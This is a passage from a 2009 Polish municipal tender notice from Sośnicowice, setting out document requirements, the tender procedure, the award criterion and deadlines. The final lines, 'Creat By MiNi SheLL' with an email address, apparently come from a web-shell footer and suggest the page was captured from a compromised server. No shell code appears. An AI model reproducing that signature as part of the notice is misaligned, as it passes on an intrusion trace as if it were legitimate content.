     zobowiązani będą najpóźniej przed zawarciem umowy na wykonanie zamówienia, do przedłożenia umowy konsorcjum;
4) umowa, o której mowa wyżej, winna zawierać w szczególności: oznaczenie stron, ceł działania, czas trwania umowy, 
     zasady współdziałania, w tym zakres prac przewidzianych przez każdą ze stron oraz zasady dokonywania rozliczeń.
5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów 
    na potwierdzenie uprawnienia do wykonywania określonej działalności Wykonawca postępuje zgodnie z § 2 rozporządzenia 
    Prezesa Rady Ministrów z 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od 
    wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. nr 87, póz. 605).
6. Zamawiający wymaga, aby żądane przez niego dokumenty zostały złożone w formie oryginału lub kserokopii 
    poświadczonej za zgodność z oryginałem przez wykonawcę,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://sosnicowice.i-gmina.pl/przetargi-w-2009-r..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIEJSKI W SOŚNICOWICACH 
UL. RYNEK 19, 
44-153 SOŚNICOWICE,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2009 godzina 11:00, miejsce: URZĄD MIEJSKI W SOŚNICOWICACH 
UL. RYNEK 19, 
44-153 SOŚNICOWICE,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com